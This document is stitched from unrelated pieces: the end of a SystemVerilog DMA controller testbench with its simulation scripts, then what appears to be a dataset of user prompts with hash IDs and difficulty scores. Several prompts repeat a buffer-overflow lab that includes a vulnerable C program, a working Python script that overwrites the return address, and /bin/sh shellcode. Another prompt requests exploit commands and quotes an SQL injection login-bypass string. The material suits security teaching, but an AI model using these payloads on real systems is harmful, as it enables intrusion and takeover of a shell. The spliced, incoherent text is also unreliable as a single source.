\$display("---------------------------------------------------");
data = 0;
while (data!=1) begin
apb_if.read(`STAT_ADDR, data);
repeat (100) @(posedge clk);
end
@(posedge clk);
elapsed_time = $realtime - elapsed_time;
$timeformat(-9, 0, " ns", 10);
$display("Elapsed time for DMA: %t", elapsed_time);
$display("---------------------------------------------------");
$display("DMA completed");
$display("---------------------------------------------------");
repeat (len) @(posedge clk); // to make sure data is written
$display("---------------------------------------------------");
$display("verify data");
$display("---------------------------------------------------");
for (int i=0; i<len; i=i+4) begin
logic [31:0] src_word;
logic [31:0] dst_word;
src_word = u_mem.read_word(src+i);
dst_word = u_mem.read_word(dst+i);
if (src_word!==dst_word) begin
\$display("Mismatch! (src:%x @%x, dst:%x @%x", src_word, src+i, dst_word, dst+i);
end
end
endtask
int src,
dst,
len;
// main
initial begin
test_init();
src = 'h0000_1000;
dst = 'h0000_2000;
len = 'h0100;
\$display("===================================================");
\$display("= 1st trial");
\$display("= Copying %x bytes from %x to %x", len, src, dst);
\$display("===================================================");
test_dma(src, dst, len);
src = 'h1234_1234;
dst = 'hABCD_ABCC;
len = 'h0F00;
\$display("===================================================");
\$display("= 2nd trial (long transfer)");
\$display("= Copying %x bytes from %x to %x", len, src, dst);
\$display("===================================================");
test_dma(src, dst, len);
src = 'h4278_0000;
dst = 'h4278_1000;
len = 'h0F10;
\$display("===================================================");
\$display("= 3rd trial (long transfer-2)");
\$display("= Copying %x bytes from %x to %x", len, src, dst);
\$display("===================================================");
test_dma(src, dst, len);
\$finish;
end
AXI_SLAVE u_mem (
.clk (clk),
.rst_n (rst_n),
.aw_ch (aw_ch),
.w_ch (w_ch),
.b_ch (b_ch),
.ar_ch (ar_ch),
.r_ch (r_ch)
);
DMAC_TOP u_DUT (
.clk (clk),
.rst_n (rst_n),
// APB interface
.psel_i (apb_if.psel),
.penable_i (apb_if.penable),
.paddr_i (apb_if.paddr[11:0]),
.pwrite_i (apb_if.pwrite),
.pwdata_i (apb_if.pwdata),
.pready_o (apb_if.pready),
.prdata_o (apb_if.prdata),
.pslverr_o (apb_if.pslverr),
// AXI AW channel
.awid_o (aw_ch.awid),
.awaddr_o (aw_ch.awaddr),
.awlen_o (aw_ch.awlen),
.awsize_o (aw_ch.awsize),
.awburst_o (aw_ch.awburst),
.awvalid_o (aw_ch.awvalid),
.awready_i (aw_ch.awready),
// AXI W channel
.wid_o (w_ch.wid),
.wdata_o (w_ch.wdata),
.wstrb_o (w_ch.wstrb),
.wlast_o (w_ch.wlast),
.wvalid_o (w_ch.wvalid),
.wready_i (w_ch.wready),
// AXI B channel
.bid_i (b_ch.bid),
.bresp_i (b_ch.bresp),
.bvalid_i (b_ch.bvalid),
.bready_o (b_ch.bready),
// AXI AR channel
.arid_o (ar_ch.arid),
.araddr_o (ar_ch.araddr),
.arlen_o (ar_ch.arlen),
.arsize_o (ar_ch.arsize),
.arburst_o (ar_ch.arburst),
.arvalid_o (ar_ch.arvalid),
.arready_i (ar_ch.arready),
// AXI R channel
.rid_i (r_ch.rid),
.rdata_i (r_ch.rdata),
.rresp_i (r_ch.rresp),
.rlast_i (r_ch.rlast),
.rvalid_i (r_ch.rvalid),
.rready_o (r_ch.rready)
);
endmodule
<<<EndOfFile:DMAC/SIM/TB/DMAC_TOP_TB.sv>>>
<<<StartOfFile:DMAC/SIM/TB/filelist.f>>>
$LAB_PATH/SIM/TB/timescale.v
$LAB_PATH/SIM/TB/AXI_INTF.sv
$LAB_PATH/SIM/TB/AXI_SLAVE.sv
$LAB_PATH/SIM/TB/DMAC_TOP_TB.sv
<<<EndOfFile:DMAC/SIM/TB/filelist.f>>>
<<<StartOfFile:DMAC/SIM/TB/timescale.v>>>
`timescale 1ns/1ps
<<<EndOfFile:DMAC/SIM/TB/timescale.v>>>
<<<StartOfFile:DMAC/SIM/run.compile>>>
#!/bin/bash
source ../../scripts/common.sh
export LAB_PATH="\$PWD/../"
FILELIST_TB="../TB/filelist.f"
FILELIST_RTL="../../RTL/filelist.f"
echo "Cleaning up the old directory"
rm -rf \$RUN_DIR
echo "Creating a new directory"
mkdir -p \$RUN_DIR
cd \$RUN_DIR
echo "Compiling"
\$COMPILE_CMD \$COMPILE_OPTIONS -f \$FILELIST_TB -f \$FILELIST_RTL
<<<EndOfFile:DMAC/SIM/run.compile>>>
<<<StartOfFile:DMAC/SIM/run.compile4cov>>>
#!/bin/bash
source ../../scripts/common.sh
export LAB_PATH="\$PWD/../"
COV_DIR="\$PWD/VDB"
COV_OPTIONS="-cm line+cond+fsm+tgl+branch -cm_dir \$COV_DIR"
FILELIST_TB="../TB/filelist.f"
FILELIST_RTL="../../RTL/filelist.f"
echo "Cleaning up the old directory"
rm -rf \$RUN_DIR
echo "Creating a new directory"
mkdir -p \$RUN_DIR
cd \$RUN_DIR
echo "Compiling"
\$COMPILE_CMD \$COMPILE_OPTIONS \$COV_OPTIONS -f \$FILELIST_TB -f \$FILELIST_RTL
<<<EndOfFile:DMAC/SIM/run.compile4cov>>>
<<<StartOfFile:DMAC/SIM/run.sim>>>
#!/bin/bash
source ../../scripts/common.sh
if [ -e $RUN_DIR/simv ];
then
cd $RUN_DIR
./simv
else
echo "Compile file does not exist"
exit 1
fi
<<<EndOfFile:DMAC/SIM/run.sim>>>
<<<StartOfFile:DMAC/SIM/run.sim4cov>>>
#!/bin/bash
source ../../scripts/common.sh
COV_DIR="\$PWD/VDB"
COV_OPTIONS="-cm line+cond+fsm+tgl+branch -cm_dir \$COV_DIR"
if [ -e \$RUN_DIR/simv ];
then
cd \$RUN_DIR
./simv \$COV_OPTIONS
else
echo "Compile file does not exist"
exit 1
fi
<<<EndOfFile:DMAC/SIM/run.sim4cov>>>
<<<StartOfFile:DMAC/SIM/run.verdi>>>
#!/bin/bash
source ../../scripts/common.sh
export LAB_PATH="\$PWD/../"
FILELIST_TB="../TB/filelist.f"
FILELIST_RTL="../../RTL/filelist.f"
cd \$RUN_DIR
\$VERDI_CMD \$VERDI_OPTIONS -f \$FILELIST_TB -f \$FILELIST_RTL
<<<EndOfFile:DMAC/SIM/run.verdi>>>
<<<StartOfFile:DMAC/SIM/run.verdi4cov>>>
verdi -cov -covdir VDB.vdb/
<<<EndOfFile:DMAC/SIM/run.verdi4cov>>>
<<<StartOfFile:DMAC/SIM/run.waveform>>>
#!/bin/bash
source ../../scripts/common.sh
if [ -e $RUN_DIR/dump.vcd ];
then
cd $RUN_DIR
$WAVE_CMD $WAVE_OPTIONS -i dump.vcd
else
echo "Dump file does not exist"
exit 1
fi
<<<EndOfFile:DMAC/SIM/run.waveform>>>
|
faca4b7791250749b35ac4956ff35878
|
{
"intermediate": 0.4172908365726471,
"beginner": 0.38497281074523926,
"expert": 0.19773636758327484
}
|
46,692
|
create for me complete site with animation css and js and php for cloths store
|
b18add8a0f3984757f6e7a18a37bf196
|
{
"intermediate": 0.5132310390472412,
"beginner": 0.1846524477005005,
"expert": 0.3021165430545807
}
|
46,693
|
train each neuron of linear layer independently
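One way to read this request (a sketch under my own interpretation, using PyTorch): split the linear layer into one single-output model per neuron, each with its own optimizer, so no gradients are shared across neurons:

import torch
import torch.nn as nn

in_features, out_features = 8, 4
x = torch.randn(64, in_features)   # toy inputs
y = torch.randn(64, out_features)  # toy targets, one column per neuron

# One independent 1-output linear model per neuron, each with its own optimizer.
neurons = [nn.Linear(in_features, 1) for _ in range(out_features)]
optims = [torch.optim.SGD(m.parameters(), lr=0.01) for m in neurons]
loss_fn = nn.MSELoss()

for step in range(100):
    for j, (m, opt) in enumerate(zip(neurons, optims)):
        opt.zero_grad()
        loss = loss_fn(m(x).squeeze(1), y[:, j])
        loss.backward()  # gradients touch only neuron j's weights
        opt.step()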
|
e7364e4b71c205c67f0d57acb11418a1
|
{
"intermediate": 0.11961061507463455,
"beginner": 0.0804639384150505,
"expert": 0.7999253869056702
}
|
46,694
|
Python: Traceback (most recent call last):
File "/Users/moran/Library/Application Support/Blender/4.0/scripts/addons/faceit/rigging/rig_operators.py", line 62, in invoke
return self.execute(context)
File "/Users/moran/Library/Application Support/Blender/4.0/scripts/addons/faceit/rigging/rig_operators.py", line 178, in execute
layer_state = rig.data.layers[:]
AttributeError: 'Armature' object has no attribute 'layers_collection'
|
43d32a467ae3d196b4f1e823f7081782
|
{
"intermediate": 0.4259847104549408,
"beginner": 0.2721186578273773,
"expert": 0.3018966615200043
}
|
46,695
|
AppData\Local\Programs\Python\Python312\Lib\site-packages\crewai\task.py", line 100, in __init__
super().__init__(**config, **data)
File "C:\Users\Administrator.DESKTOP-3HB1DA0\AppData\Local\Programs\Python\Python312\Lib\site-packages\pydantic\main.py", line 175, in __init__
self.__pydantic_validator__.validate_python(data, self_instance=self)
pydantic_core._pydantic_core.ValidationError: 1 validation error for Task
expected_output
Field required [type=missing, input_value={'description': 'Investig...r data science company)}, input_type=dict]
For further information visit https://errors.pydantic.dev/2.7/v/missing
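The validation error means the Task was constructed without the required expected_output field. A minimal sketch of the fix (the description, expected_output, and agent values are placeholders; researcher assumes an Agent instance defined elsewhere):

from crewai import Task

task = Task(
    description="Investigate the latest trends",     # placeholder description
    expected_output="A short bullet-point summary",  # the missing required field
    agent=researcher,                                # assumed Agent defined elsewhere
)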
|
b4189a990f95715021260f5479d30d71
|
{
"intermediate": 0.3898892402648926,
"beginner": 0.2737980782985687,
"expert": 0.33631274104118347
}
|
46,696
|
We have a table authors with columns name, surname, age and country, and a table books with columns book_name, number of pages and author. The author field in the book model is a foreign key referencing the column name in the authors table. Write a Django model to take this constraint into consideration.
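A sketch of the two models; because a Django ForeignKey must point at a unique column, name is declared unique so to_field can reference it (max_length values and the snake_cased number_of_pages field name are my own assumptions):

from django.db import models

class Author(models.Model):
    name = models.CharField(max_length=100, unique=True)  # FK target must be unique
    surname = models.CharField(max_length=100)
    age = models.PositiveIntegerField()
    country = models.CharField(max_length=100)

class Book(models.Model):
    book_name = models.CharField(max_length=200)
    number_of_pages = models.PositiveIntegerField()
    author = models.ForeignKey(
        Author,
        to_field="name",     # reference the name column instead of the primary key
        db_column="author",
        on_delete=models.CASCADE,
    )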
|
ad48fdf9fd4c859332b6cefa79834566
|
{
"intermediate": 0.47697365283966064,
"beginner": 0.13894599676132202,
"expert": 0.38408032059669495
}
|
46,697
|
I have historical data for a crypto asset as a CSV file.
I want to train an LSTM model on this data so it can predict the close price of the next day based on the last 30 days.
Give me proper Python code.
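A compact sketch using Keras (the file name, column name, and hyperparameters are assumptions) of the 30-day windowed LSTM described above:

import numpy as np
import pandas as pd
from sklearn.preprocessing import MinMaxScaler
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import LSTM, Dense

df = pd.read_csv("crypto.csv")             # assumed file name
close = df["Close"].values.reshape(-1, 1)  # assumed column name

scaler = MinMaxScaler()
close_scaled = scaler.fit_transform(close)

# Build sliding windows: 30 past closes -> next day's close.
WINDOW = 30
X = np.array([close_scaled[i:i + WINDOW] for i in range(len(close_scaled) - WINDOW)])
y = close_scaled[WINDOW:]

split = int(0.8 * len(X))
X_train, X_test, y_train, y_test = X[:split], X[split:], y[:split], y[split:]

model = Sequential([
    LSTM(50, input_shape=(WINDOW, 1)),
    Dense(1),
])
model.compile(optimizer="adam", loss="mse")
model.fit(X_train, y_train, epochs=20, batch_size=32, validation_data=(X_test, y_test))

# Predict the next day from the most recent 30 days and undo the scaling.
next_day = model.predict(close_scaled[-WINDOW:].reshape(1, WINDOW, 1))
print(scaler.inverse_transform(next_day))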
|
5ac5883bf2e8a19a0b9fec00ef7d2c09
|
{
"intermediate": 0.33230847120285034,
"beginner": 0.1369507610797882,
"expert": 0.5307407379150391
}
|
46,698
|
vuln_program.c:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char passwd[] = "asd";
char usr_input[4];
void target() {
printf("You have entered the correct passwd\n");
exit(0);
}
void prompt(){
char buf[4];
gets(buf);
strncpy(usr_input, buf, 4);
}
int main(){
prompt();
if(strcmp(usr_input, passwd) == 0) {
target();
}else {
printf("Wrong passwd!\n");
exit(1);
}
return 0;
}
gcc -fno-stack-protector -z execstack -fno-pie -no-pie -m32 -O0 -g vuln_program.c -o vuln_program
Use a binary analyzing tool to get the address of target function. Tools like nm, readelf and objdump can fulfill this job.
Target function address is 08049196; now construct the attack string using your program and store it in the attack_string file. Your program should be named attack and take the target function address as input. For example, if 0xdeadbeaf is the target function address and your code is written in python, then running "python3 attack.py deadbeef" will create a string stored in the attack_string file to be further used to exploit the vulnerability in the vulnerable program.
The following will try to help you understand how to construct an attack string:
Stack layout of the vulnerable program contains buf, which is 4 bytes, other vars, which are 8 bytes, %ebp, which is 4 bytes, %eip and &arg1 while the prompt function is being invoked. The goal is to overwrite the buffer until the return address (%eip) on the stack contains the target function address. Based on this, construct your attack string carefully. One thing to be aware of is that the address is in little-endian format. For example, if the target address is "0xdeadbeef", then the bytes of the return address at RA will be RA[0]:ef, RA[1]:be, RA[2]:ad, RA[3]:de.
Stack layout of launching shellcode contains buffer, return address %eip, nop nop nop....., injected code.
Overwrite the buffer in a specific way that:
1. Overwrite the buffer with padding.
2. Overwrite the return address(%eip) on the stack with a guessed address that probably will jump to the injected malicious code.
3. NOPs (0x90) can be filled in between the return address and the injected malicious code to increase the chance that the injected code will be executed. The nop instruction does nothing; execution simply falls through to the next instruction.
4. The shellcode is then provided as the payload at the end of the overwrite.
The shellcode that is used to launch a shell is provided as following:
"\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
Use the attack program to generate the attack payload for this shellcode exploitation.
attack.py:
import sys
def generate_attack_string(target_addr):
# Convert the hexadecimal address from a string to an integer
addr_int = int(target_addr, 16)
# Convert the address to little-endian format
little_endian_addr = addr_int.to_bytes(4, byteorder='little')
# Construct the attack string
# buf[4] + other vars[8] + %ebp[4] + %eip[4]
# Total payload size = 4 (buf) + 8 (other vars) + 4 (%ebp)
# And then we append the little_endian_addr to overwrite %eip
payload_size = 4 + 8 + 4
padding = b'A' * payload_size
attack_string = padding + little_endian_addr
return attack_string
def main(target_addr):
attack_string = generate_attack_string(target_addr)
with open("attack_string", "wb") as f:
f.write(attack_string)
print("Attack string saved to 'attack_string'.")
if __name__ == "__main__":
if len(sys.argv) != 2:
print("Usage: python3 attack.py [target function address]")
sys.exit(1)
target_addr = sys.argv[1]
main(target_addr)
python3 attack.py 08049196, ./vuln_program < attack_string
Providing the argument as "shellcode" to the attack program will generate the shellcode attack payload. For example, if your code is written in python, run your program as "python3 attack.py shellcode". The output of your program should be a file named "shell_string" which stores the attack payload for launching the shellcode. Write a README for it which includes program title, author, language, execution, status, description, and testing.
|
20108616679593eeece91c9657ec5034
|
{
"intermediate": 0.3239026963710785,
"beginner": 0.3281060457229614,
"expert": 0.34799131751060486
}
|
46,699
|
vuln_program.c:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char passwd[] = "asd";
char usr_input[4];
void target() {
printf("You have entered the correct passwd\n");
exit(0);
}
void prompt(){
char buf[4];
gets(buf);
strncpy(usr_input, buf, 4);
}
int main(){
prompt();
if(strcmp(usr_input, passwd) == 0) {
target();
}else {
printf("Wrong passwd!\n");
exit(1);
}
return 0;
}
gcc -fno-stack-protector -z execstack -fno-pie -no-pie -m32 -O0 -g vuln_program.c -o vuln_program
Use a binary analyzing tool to get the address of target function. Tools like nm, readelf and objdump can fulfill this job.
Target function address is 08049196; now construct the attack string using your program and store it in the attack_string file. Your program should be named attack and take the target function address as input. For example, if 0xdeadbeaf is the target function address and your code is written in python, then running "python3 attack.py deadbeef" will create a string stored in the attack_string file to be further used to exploit the vulnerability in the vulnerable program.
The following will try to help you understand how to construct an attack string:
Stack layout of the vulnerable program contains buf, which is 4 bytes, other vars, which are 8 bytes, %ebp, which is 4 bytes, %eip and &arg1 while the prompt function is being invoked. The goal is to overwrite the buffer until the return address (%eip) on the stack contains the target function address. Based on this, construct your attack string carefully. One thing to be aware of is that the address is in little-endian format. For example, if the target address is "0xdeadbeef", then the bytes of the return address at RA will be RA[0]:ef, RA[1]:be, RA[2]:ad, RA[3]:de.
Stack layout of launching shellcode contains buffer, return address %eip, nop nop nop…, injected code.
Overwrite the buffer in a specific way that:
1. Overwrite the buffer with padding.
2. Overwrite the return address(%eip) on the stack with a guessed address that probably will jump to the injected malicious code.
3. NOPs (0x90) can be filled in between the return address and the injected malicious code to increase the chance that the injected code will be executed. The nop instruction does nothing; execution simply falls through to the next instruction.
4. The shellcode is then provided as the payload at the end of the overwrite.
The shellcode that is used to launch a shell is provided as following:
"\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
attack.py:
import sys
def generate_attack_string(target_addr):
# Convert the hexadecimal address from a string to an integer
addr_int = int(target_addr, 16)
# Convert the address to little-endian format
little_endian_addr = addr_int.to_bytes(4, byteorder='little')
# Construct the attack string
# buf[4] + other vars[8] + %ebp[4] + %eip[4]
# Total payload size = 4 (buf) + 8 (other vars) + 4 (%ebp)
# And then we append the little_endian_addr to overwrite %eip
payload_size = 4 + 8 + 4
padding = b'A' * payload_size
attack_string = padding + little_endian_addr
return attack_string
def main(target_addr):
attack_string = generate_attack_string(target_addr)
with open("attack_string", "wb") as f:
f.write(attack_string)
print("Attack string saved to 'attack_string'.")
if __name__ == "__main__":
if len(sys.argv) != 2:
print("Usage: python3 attack.py [target function address]")
sys.exit(1)
target_addr = sys.argv[1]
main(target_addr)
python3 attack.py 08049196, ./vuln_program < attack_string
Providing the argument as "shellcode" to the attack program will generate the shellcode attack payload. For example, if your code is written in python, run your program as "python3 attack.py shellcode". The output of your program should be a file named "shell_string" which stores the attack payload for launching the shellcode. Write a README for it which includes program title, author, language, execution, status, description, and testing.
|
00ea8b6bfb1081a7f6f359e19cbf41a3
|
{
"intermediate": 0.4650653898715973,
"beginner": 0.33369702100753784,
"expert": 0.20123757421970367
}
|
46,700
|
vuln_program.c:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char passwd[] = "asd";
char usr_input[4];
void target() {
printf("You have entered the correct passwd\n");
exit(0);
}
void prompt(){
char buf[4];
gets(buf);
strncpy(usr_input, buf, 4);
}
int main(){
prompt();
if(strcmp(usr_input, passwd) == 0) {
target();
}else {
printf("Wrong passwd!\n");
exit(1);
}
return 0;
}
gcc -fno-stack-protector -z execstack -fno-pie -no-pie -m32 -O0 -g vuln_program.c -o vuln_program
Use a binary analyzing tool to get the address of target function. Tools like nm, readelf and objdump can fulfill this job.
Target function address is 08049196; now construct the attack string using your program and store it in the attack_string file. Your program should be named attack and take the target function address as input. For example, if 0xdeadbeaf is the target function address and your code is written in python, then running "python3 attack.py deadbeef" will create a string stored in the attack_string file to be further used to exploit the vulnerability in the vulnerable program.
The following will try to help you understand how to construct an attack string:
Stack layout of the vulnerable program contains buf, which is 4 bytes, other vars, which are 8 bytes, %ebp, which is 4 bytes, %eip and &arg1 while the prompt function is being invoked. The goal is to overwrite the buffer until the return address (%eip) on the stack contains the target function address. Based on this, construct your attack string carefully. One thing to be aware of is that the address is in little-endian format. For example, if the target address is "0xdeadbeef", then the bytes of the return address at RA will be RA[0]:ef, RA[1]:be, RA[2]:ad, RA[3]:de.
Stack layout of launching shellcode contains buffer, return address %eip, nop nop nop…, injected code.
Overwrite the buffer in a specific way that:
1. Overwrite the buffer with padding.
2. Overwrite the return address(%eip) on the stack with a guessed address that probably will jump to the injected malicious code.
3. NOPs (0x90) can be filled in between the return address and the injected malicious code to increase the chance that the injected code will be executed. The nop instruction does nothing; execution simply falls through to the next instruction.
4. The shellcode is then provided as the payload at the end of the overwrite.
The shellcode that is used to launch a shell is provided as following:
"\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
Use the attack program to generate the attack payload for this shellcode exploitation.
attack.py:
import sys
def generate_attack_string(target_addr):
# Convert the hexadecimal address from a string to an integer
addr_int = int(target_addr, 16)
# Convert the address to little-endian format
little_endian_addr = addr_int.to_bytes(4, byteorder='little')
# Construct the attack string
# buf[4] + other vars[8] + %ebp[4] + %eip[4]
# Total payload size = 4 (buf) + 8 (other vars) + 4 (%ebp)
# And then we append the little_endian_addr to overwrite %eip
payload_size = 4 + 8 + 4
padding = b'A' * payload_size
attack_string = padding + little_endian_addr
return attack_string
def main(target_addr):
attack_string = generate_attack_string(target_addr)
with open("attack_string", "wb") as f:
f.write(attack_string)
print("Attack string saved to 'attack_string'.")
if __name__ == "__main__":
if len(sys.argv) != 2:
print("Usage: python3 attack.py [target function address]")
sys.exit(1)
target_addr = sys.argv[1]
main(target_addr)
python3 attack.py 08049196, ./vuln_program < attack_string
Providing the argument as "shellcode" to the attack program will generate the shellcode attack payload. For example, if your code is written in python, run your program as "python3 attack.py shellcode". The output of your program should be a file named "shell_string" which stores the attack payload for launching the shellcode. Write only a README for it which includes program title, author, language, execution, status, description, and testing. Don't do anything else; just write the README.
|
ae3be27090581ae57e025e76aef0b553
|
{
"intermediate": 0.407917320728302,
"beginner": 0.3196989893913269,
"expert": 0.27238374948501587
}
|
46,701
|
Getting this error when running makemigrations in Django; how can I fix it? data_model.VEHICULE.usage: (fields.E304) Reverse accessor 'MD_USAGE.usage_fk' for 'data_model.VEHICULE.usage' clashes with reverse accessor for 'data_model.REDUCTIONS.usage'.
HINT: Add or change a related_name argument to the definition for 'data_model.VEHICULE.usage' or 'data_model.REDUCTIONS.usage'.
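The HINT points at the fix: give at least one of the two foreign keys a distinct related_name. A minimal sketch using the model and field names from the error (the related_name values and field options are my own placeholders):

from django.db import models

class VEHICULE(models.Model):
    usage = models.ForeignKey(
        "MD_USAGE",
        on_delete=models.CASCADE,
        related_name="vehicules",   # placeholder; any name distinct from REDUCTIONS' accessor works
    )

class REDUCTIONS(models.Model):
    usage = models.ForeignKey(
        "MD_USAGE",
        on_delete=models.CASCADE,
        related_name="reductions",  # placeholder
    )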
|
2ac3e4195343c236d33ac37ed6648219
|
{
"intermediate": 0.7466117143630981,
"beginner": 0.11583466827869415,
"expert": 0.13755358755588531
}
|
46,702
|
Name 10 hacking exploit simulations, like an SQL injection such as admin' --
SELECT * FROM users WHERE username = 'admin' --' AND password = ''; with the commands you could put into a terminal, for education purposes only. This is for my college class and the paper is due tomorrow.
|
bb2edf436a786b6d0e5db60425f34642
|
{
"intermediate": 0.24133095145225525,
"beginner": 0.32554537057876587,
"expert": 0.4331236779689789
}
|
46,703
|
What does this error mean?
[root@localhost ~]# dnf install epel-release
Last metadata expiration check: 0:11:54 ago on Mon 15 Apr 2024 10:58:00 AM +07.
No match for argument: epel-release
Error: Unable to find a match: epel-release
|
91278a122e0a71e4bf1cf303f29f5920
|
{
"intermediate": 0.3873503506183624,
"beginner": 0.3511311411857605,
"expert": 0.26151853799819946
}
|
46,704
|
It throws this error:
[root@localhost ~]# dnf install https://dl.fedoraproject.org/pub/epel/epel-release-latest-8.noarch.rpm
Last metadata expiration check: 0:17:45 ago on Mon 15 Apr 2024 10:58:00 AM +07.
epel-release-latest-8.noarch.rpm 24 kB/s | 25 kB 00:01
Error:
Problem: conflicting requests
- nothing provides redhat-release >= 8 needed by epel-release-8-19.el8.noarch from @commandline
(try to add '--skip-broken' to skip uninstallable packages)
|
78ff0cefd2a13c27a5f1eafbbe691bf9
|
{
"intermediate": 0.36535879969596863,
"beginner": 0.3482733964920044,
"expert": 0.28636786341667175
}
|
46,705
|
using static System.Formats.Asn1.AsnWriter;
using System.Runtime.InteropServices;
import javax.persistence.Entity;
import javax.persistence.GeneratedValue;
import javax.persistence.GenerationType;
import javax.persistence.Id;
@Entity
public class Score
{
@Id
@GeneratedValue(strategy = GenerationType.AUTO)
private Long id;
private String username;
private int points;
// constructors, getters and setters omitted
}
public interface ScoreRepository extends JpaRepository<Score, Long> {
Score findByUsername(String username);
}
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Service;
@Service
public class ScoreService
{
private final ScoreRepository scoreRepository;
@Autowired
public ScoreService(ScoreRepository scoreRepository)
{
this.scoreRepository = scoreRepository;
}
// Add or update a user's score
public Score saveOrUpdateScore(String username, int points)
{
Score score = scoreRepository.findByUsername(username);
if (score == null)
{
score = new Score();
score.setUsername(username);
}
score.setPoints(points);
return scoreRepository.save(score);
}
// Get a user's score
public Score getScoreByUsername(String username)
{
return scoreRepository.findByUsername(username);
}
}
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.web.bind.annotation.*;
@RestController
@RequestMapping("/api/scores")
public class ScoreController
{
private final ScoreService scoreService;
@Autowired
public ScoreController(ScoreService scoreService)
{
this.scoreService = scoreService;
}
@PostMapping("/update")
public Score updateScore(@RequestParam String username, @RequestParam int points)
{
return scoreService.saveOrUpdateScore(username, points);
}
@GetMapping("/{username}")
public Score getScore(@PathVariable String username)
{
return scoreService.getScoreByUsername(username);
}
}
Help me debug this
|
7cd5d7a6343079c4d6d42cef407e1d14
|
{
"intermediate": 0.4115680158138275,
"beginner": 0.356106698513031,
"expert": 0.23232531547546387
}
|
46,706
|
from nltk.stem import PorterStemmer  # import needed for PorterStemmer below

def fn_get_predefined_answer(question):
    preprocessed_question_var = fn_preprocess_question(question)
    for predefined_question_var, predefined_answer_var in dict_predefined_answers.items():
        if fn_preprocess_question(predefined_question_var) in preprocessed_question_var:
            return predefined_answer_var

porter_stemmer = PorterStemmer()
#--------------------------------------
def fn_preprocess_question(question):
return ' '.join([porter_stemmer.stem(word) for word in question.split()])
dict_predefined_answers ={
"Who are you":"I am the SAMS bot, your Virtual Sales Assistant. I’m here to help you navigate through SAMS databases and provide the information you need.",
"Hi":"Hello, Welcome to SAMS Virtual Sales Assistant. I am designed to assist you in retrieving information from various SAMS databases. Please feel free to ask your queries, such as, 'What is the total sellout across India for July 16, 2022? among others.",
"What can you do":"I am equipped to offer you comprehensive insights and data from SAMS databases. Whether you need sales figures or specific reports, just ask, and I’ll provide the most accurate information available.Although my training is still going on.",
"How can I use this service":"Using this service is simple. Just type in your query about any sales or database-related information, like ‘Show the sales trend for product XYZ during the last month,' and I'll fetch the details for you.",
"I'm not sure what to ask.":"No problem at all. You can start with general queries like 'What were the top-selling products last month?'' or 'Update me on the current monthly sales report.' I am here to guide you through accessing the precise information you need.",
"Thank you":"You're most welcome! If you have any more questions or need further assistance, I'm here to help. Your success is my priority.",
"Goodbye":"Farewell! If you ever require any assistance or have more queries in the future, don't hesitate to reach out. Have a great day ahead!",
"Bye":"Farewell! If you ever require any assistance or have more queries in the future, don't hesitate to reach out. Have a great day ahead!",
"How are you":"I am good,Please ask anything related to SAMS and I will try to provide you best possible solution.Thanks"
}
Whenever I give values like "which" or "highest", the "Hi" key in dict_predefined_answers is invoked. Why is that, and how do I correct it?
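The reason: fn_preprocess_question("Hi") stems to "hi", and the lookup uses the substring operator in on the whole preprocessed question, so "hi" matches inside "which" and "highest". A sketch of a corrected lookup that compares whole stemmed words instead of substrings:

def fn_get_predefined_answer(question):
    question_words = set(fn_preprocess_question(question).split())
    for predefined_question_var, predefined_answer_var in dict_predefined_answers.items():
        key_words = set(fn_preprocess_question(predefined_question_var).split())
        # Match only if every stemmed word of the key appears as a whole word.
        if key_words and key_words.issubset(question_words):
            return predefined_answer_var
    return None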
|
cedc26c2d3b8ee5dc06fe6ce89d19759
|
{
"intermediate": 0.3472153842449188,
"beginner": 0.3524501323699951,
"expert": 0.30033445358276367
}
|
46,707
|
I have a server running RedOS and it throws an error. How do I fix it?
[root@localhost ~]# dnf --enablerepo=powertools install libedit-devel
Error: Unknown repo: 'powertools'
[root@localhost ~]#
|
b3ad346f9bcc6732d6c46cfdc449b994
|
{
"intermediate": 0.48076003789901733,
"beginner": 0.3391513228416443,
"expert": 0.1800885945558548
}
|
46,708
|
Show connected user ping colyseus
|
650d21367c673cc9c101445003be9842
|
{
"intermediate": 0.3456595242023468,
"beginner": 0.3106468915939331,
"expert": 0.3436935544013977
}
|
46,709
|
When installing Asterisk, after running the ./configure command it throws this error:
make: *** [Makefile:92: /tmp/pjproject-2.10.tar.bz2] Error 4
make: *** Deleting file '/tmp/pjproject-2.10.tar.bz2'
failed
configure: Unable to configure third-party/pjproject
configure: error: Re-run the ./configure command with 'NOISY_BUILD=yes' appended to see error details.
[root@localhost asterisk-16.15.1]#
|
8cf99bb314d3785744dc191923065f6f
|
{
"intermediate": 0.3543435037136078,
"beginner": 0.31084805727005005,
"expert": 0.33480846881866455
}
|
46,710
|
What is the error?
[root@localhost asterisk-16.15.1]# systemctl start asterisk
Job for asterisk.service failed because a timeout was exceeded.
See "systemctl status asterisk.service" and "journalctl -xeu asterisk.service" for details.
|
057f48a347df3db0d45166556bf679b3
|
{
"intermediate": 0.4227191209793091,
"beginner": 0.3407037556171417,
"expert": 0.2365771383047104
}
|
46,711
|
Increase the number of records displayed in a list within Service Operations Workspace. Similar to the system property glide.ui.per.page, which allows updating the max number of rows returned in a list on the platform (I set it to 500), is there a property or a way to do the same for Service Operations Workspace? I was not able to find one.
|
e559df931a3e883938ecbb0d272cf6c4
|
{
"intermediate": 0.6823617815971375,
"beginner": 0.1512841135263443,
"expert": 0.16635410487651825
}
|
46,712
|
When installing FreePBX it throws an error:
